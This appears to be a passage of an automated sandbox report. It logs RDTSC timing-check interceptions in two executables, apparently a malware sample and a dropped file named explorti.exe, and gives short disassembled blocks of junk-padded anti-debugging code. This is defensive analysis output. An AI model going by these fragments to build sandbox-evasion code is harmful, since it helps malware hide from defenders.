Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D9E second address: 54E0DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b pushad 0x0000000c mov edi, eax 0x0000000e mov cx, 2023h 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0DB8 second address: 54E0DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0DBC second address: 54E0DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5F05E second address: B5F064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8ED second address: B5E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8F1 second address: B5E8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8F5 second address: B5E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECEE second address: CDECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BC8515D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D7B second address: CC9D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD7D second address: CDDD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8A second address: CDDD8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BCB462B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD9E second address: CDDDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDDA4 second address: CDDDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDE095 second address: CDE099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDFEF8 second address: CDFEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDFEFC second address: CDFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BCB462B6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BCB462C8h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BC8515DAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BC8515D9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE022D second address: CE0232 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BCB462BDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BCB462C4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BCB462B8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0286 second address: CE028C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE028C second address: CE0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549035B second address: 5490378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490378 second address: 54903D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462C7h 0x00000009 xor ecx, 0193E86Eh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FF0BCB462BCh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF0BCB462BEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903D6 second address: 5490493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515DCh 0x00000009 jmp 00007FF0BC8515E5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF0BC8515DCh 0x0000001a adc esi, 570448A8h 0x00000020 jmp 00007FF0BC8515DBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FF0BC8515E8h 0x0000002c xor ax, 3B08h 0x00000031 jmp 00007FF0BC8515DBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FF0BC8515E0h 0x00000041 sub ch, 00000068h 0x00000044 jmp 00007FF0BC8515DBh 0x00000049 popfd 0x0000004a popad 0x0000004b push FFFFFFFEh 0x0000004d jmp 00007FF0BC8515E6h 0x00000052 push 3B19A7ADh 0x00000057 pushad 0x00000058 mov bl, 8Eh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490493 second address: 5490526 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3BE0186Bh 0x0000000e pushad 0x0000000f call 00007FF0BCB462BAh 0x00000014 mov dx, si 0x00000017 pop esi 0x00000018 call 00007FF0BCB462C7h 0x0000001d pop ebx 0x0000001e popad 0x0000001f push 16FA815Bh 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 add dword ptr [esp], 5FF62CA5h 0x00000030 pushad 0x00000031 movzx esi, di 0x00000034 mov edi, 768EDF64h 0x00000039 popad 0x0000003a mov eax, dword ptr fs:[00000000h] 0x00000040 pushad 0x00000041 push edx 0x00000042 mov edi, esi 0x00000044 pop eax 0x00000045 pushfd 0x00000046 jmp 00007FF0BCB462C1h 0x0000004b or ax, 5A56h 0x00000050 jmp 00007FF0BCB462C1h 0x00000055 popfd 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490526 second address: 5490539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490539 second address: 5490597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BFh 0x00000009 add eax, 1C07F43Eh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 jmp 00007FF0BCB462C0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FF0BCB462BBh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, 0126h 0x0000002b mov cx, bx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490597 second address: 54905E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007FF0BC8515E0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0BC8515E7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905E0 second address: 549061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0BCB462BFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF0BCB462BFh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF0BCB462C5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549061F second address: 5490652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF0BC8515E3h 0x00000012 pop ecx 0x00000013 mov edi, 0B913E8Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490652 second address: 549066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549066F second address: 549068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549068B second address: 54906B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54906B2 second address: 54906CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, 9BF3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54906CF second address: 54907A0 instructions: 0x00000000 rdtsc 0x00000002 mov di, D5C8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462BEh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov edi, ecx 0x00000013 pushfd 0x00000014 jmp 00007FF0BCB462BAh 0x00000019 jmp 00007FF0BCB462C5h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [76FBB370h] 0x00000025 jmp 00007FF0BCB462BEh 0x0000002a xor dword ptr [ebp-08h], eax 0x0000002d jmp 00007FF0BCB462C0h 0x00000032 xor eax, ebp 0x00000034 jmp 00007FF0BCB462C1h 0x00000039 nop 0x0000003a jmp 00007FF0BCB462BEh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FF0BCB462BCh 0x00000049 and si, FF48h 0x0000004e jmp 00007FF0BCB462BBh 0x00000053 popfd 0x00000054 pushfd 0x00000055 jmp 00007FF0BCB462C8h 0x0000005a sbb al, FFFFFFA8h 0x0000005d jmp 00007FF0BCB462BBh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907A0 second address: 54907B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907B8 second address: 54907CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462BAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907CD second address: 5490873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FF0BC8515E6h 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushfd 0x0000001a jmp 00007FF0BC8515DDh 0x0000001f add ecx, 73802086h 0x00000025 jmp 00007FF0BC8515E1h 0x0000002a popfd 0x0000002b pop eax 0x0000002c mov dh, B7h 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 jmp 00007FF0BC8515E8h 0x00000037 mov eax, dword ptr [esi+10h] 0x0000003a jmp 00007FF0BC8515E0h 0x0000003f test eax, eax 0x00000041 jmp 00007FF0BC8515E0h 0x00000046 jne 00007FF12E280A93h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490873 second address: 5490890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490890 second address: 54908FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FF0BC8515E7h 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, bx 0x00000019 pushfd 0x0000001a jmp 00007FF0BC8515E7h 0x0000001f and ax, E9EEh 0x00000024 jmp 00007FF0BC8515E9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54908FF second address: 549092B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b jmp 00007FF0BCB462BEh 0x00000010 mov dword ptr [ebp-24h], ebx 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F6B second address: 5480F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F71 second address: 5480FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BCB462C8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480FA1 second address: 5480FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480FA5 second address: 5480FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BCB462B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462BDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BC8515D6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BC8515D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BC8515D6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BC8515E8h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BCB462BAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BCB462C9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BCB462B9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BC8515DDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BC8515E4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BC8515DBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BC8515D8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CF2C37 second address: CF2C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFF8EA second address: CFF912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF0BCB462C3h 0x0000000f jmp 00007FF0BCB462BBh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFF912 second address: CFF925 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BC8515DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFFA4D second address: CFFA72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C7h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CFFBAD second address: CFFBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00162 second address: D0016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
